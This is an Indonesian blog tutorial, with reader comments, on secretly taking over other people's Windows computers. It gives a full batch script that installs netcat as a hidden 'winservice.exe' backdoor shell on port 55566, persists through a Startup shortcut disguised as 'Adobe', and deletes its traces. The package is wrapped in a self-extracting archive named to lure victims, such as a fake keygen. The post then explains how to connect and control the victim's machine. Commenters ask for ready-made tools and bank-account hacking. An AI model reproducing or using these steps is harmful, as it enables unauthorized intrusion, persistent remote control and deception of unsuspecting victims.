NetCat, Ambil Alih Komputer Orang Lain


  1. download netcat (cari di paman google)
  2. buat file shortcut baru caranya, klik kanan pilih “New>Shortcut”
  3. masukan %systemroot% pada inputan lalu klik “next”
  4. muncul dialog lagi, masukin nama file di inputannya dengan nama “WINDOWS” tanpa quote, klik “finish”
  5. sekarang file shortcut dengan nama “WINDOWS” sudah terbentuk
  6. klik kanan di file “WINDOWS” tersebut lalu pilih properties
  7. tambahkan pada inputan “Target” sehingga menjadi seperti ini “%systemroot%\winntserv\winservice.exe -d -L -p 55566 -e cmd” klik “ok”
  8. pada inputan “Run” ubah dropdownlist dan pilih “Minimized
  9. ubah nama file “WINDOWS” menjadi sesuatu yang tidak mencurigakan, saya pakai “Adobe
  10. pembuatan file shortcut selesai
  11. selanjutnya bkin file baru dengan nama setup.bat
  12. edit file tersebut menggunakan notepad atau semacamnya lah
  13. copy – paste code berikut
  14. @echo off
    REM cek sudah terinstall belom
    if exist %systemroot%\winntserv goto exit
    REM bikin tempat
    md %systemroot%\winntserv
    REM kopiin
    copy /y nc.exe %systemroot%\winntserv\winservice.exe > null
    copy /y adobe.lnk “%allusersprofile%\start menu\programs\startup” > null

    REM Jalanin
    “%allusersprofile%\start menu\programs\startup\adobe.lnk”
    REM hapus jejak
    del nc.exe
    del adobe.lnk
    del setup.bat
    :exit

  15. save file tersebut
  16. sekarang berarti kita punya 3 file “nc.exe” (netcat), “Adobe.lnk” (shortcut file), dan “setup.bat
  17. compress menggunakan winrar…bisa kan? apa ngga bisa juga!!?? tnyain sama tmen2 kamu deh sana…
  18. save dengan nama file yang menarik seperti “NaughtyAmerica_klip.rar” or “miyabi_sebelum_mati.rar” or “delphi2007_keygen.rar” or “mahasiswi_baru3gp.rar” or Whatever lah pokoknya yang bikin orang kagak nahan pengen nge klik gitu loh ,,,be creative dude!!
  19. gwa pilih “delphi2007_keygen.rar” (biar ngga keliatan omesnya….)
  20. double-cllick file “delphi2007_keygen.rar”, nanti winrar bakal nongol
  21. jadiin file SFX (Self Execute), file “delphi2007_keygen.rar”-nya caranya liat gambar berikut
  22. note: untuk gambar diatas pada bagian “Customize SFX icon” silahkan cari icon yang tidak mencurigakan orang, ex ikon bergambar folder (liat virus brontok icon-nya bentuknya folderkan)

  23. kalo berhasil ntar file exe nya ada, dengan nama “delphi2007_keygen.exe“, kalo ngga ada ulangi lagi!!
  24. OK!! persiapan sudah BERES!, saatnya beraksi!
  25. siapkan target victimnya.
  26. kirim file “delphi2007_keygen.exe” tersebut ke si target
  27. sekarang tunggu, dan berharap agar target ketipu dan ngejalanin program tersebut
  28. jikalau target tidak kejebak berarti kurang mantap nih strategi-nya selanjutnya tingkatkan kreatifitas kalian semua, pokoknya kita harus  bisa meyakinkan orang untuk nge-buka file ini…tapi ingat jangan di klik di kompi kalian sendiri yah..itu namanya senjata makan tuan-nya, don’t be noob person plz…
  29. Yes! anggap target dah kejebak,  dan udah ngejalanin program “delphi2007_keygen.exe” ini

Beres??? belum lah! sekarang kita bakalan take control komputer target, intinya kita bakalan ngebuka command prompt (cmd) di kompi kita, tapi cmd tersebut sebenarnya adalah cmd punya si target, yang tentu saja isinya adalah semua isi komputer dia!! dan bisa kita akses dengan santai…,dan apa bila kita memerintahkan suatu command di cmd kita, maka command tersebut akan di jalankan di kompinya target juga!!, bahasa keren-nya adalah “Shell Remote Exploit

Ok! berikut step by step untuk mengambil alih kompi target

  1. buka command prompt….ngga bisa juga?!! pencet Start>Run>ketikin “cmd” tanpa quote
  2. command prompt nongol, ketikin “cd tempat\folder\netcat_berada” tanpa quote, tekan enter
  3. ceritanya kita sudah dapet ip sang target yaitu 125.163.111.222 (untuk metode pencarian IP ntar bakal di post deh, salah satunya menggunakan trik yang ini)
  4. ping target, tujuannya untuk tahu apakah kompi target hidup atau mati, caranya ketikin ” ping 125.163.111.222 ” tanpa quote, tekan enter, tunggu sebentar kalau resultnya “Request Time Out”, berarti kompi target lagi mati, kalau resultnya selain itu berarti kompi target nyala nice!
  5. aggap kompi target nyala masih di command prompt ketikin ” nc 125.163.111.222 55566 ” tanpa quote, lalu tekan enter
  6. kalao berhasil ntar muncul “c:\windows\system32\winservice” or “c:\windows\system\winservice” tergantung dari versi windows komputer target pokoknya yang penting ada kata “winservice“-nya
  7. kalau sudah ada prompt seperti di atas, berarti anda sudah berada dalam komputer target WoogH!untuk mengecek apakah anda sudah berada di kompi target ketikan di cmd ” ipconfig /all ” cocokan IP yg tertera pada command prompt, dengan IP target, kalo sama yeaahh you Owned him!!
  8. Finish.

Sekarang ambil minuman dingin bersoda, sebatang rokok…biarkanlah badan and otak kita sedikit relax… sambil memikirkan apa yang akan kita lakukan di kompi target…

Tapi ingat satu hal

Don’t be STUPID Lame by Destroying Some innocent Person Work!!

yaa sekedar jalan-jalan di harddisk orang sepanjang kita ngga ngerusak kan gak papa…terus klo udah puas jalan2nya kasih tau target untuk menyalakan firewall gitu….huhuhu…

Oya! satu lagi, pada tutorial ini saya menyeting supaya program “delphi2007_keygen.exe” menjadi Autorun, jadi komputer target bisa kita remote lagi, setiap kali kompi target dinyalain

Have fun,  Do not cause too much trouble guys…. enjoy…

5 responses to “NetCat, Ambil Alih Komputer Orang Lain

  1. wah manteb juga tuch article, tapi lebih mantep’a sediain langsung dunk software yg udah anda buat,
    apalagi sekalian di bikin auto start up…

    tapi gak apalah mantab, tapi klo gak bsa di peraktekin tanggung jawab yach mas???

    • wa buat prog namana netcat droper, itu lbih mudah makenya, check teh site xD, klo ada pertanyaan post ajah, thx

  2. wew bguz tuh artikelna…
    lanjutin boz artikelna…?
    klo bsa cra nge-hack rekening org laen..
    hihihi…
    soalna susah cri duit oey!!!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s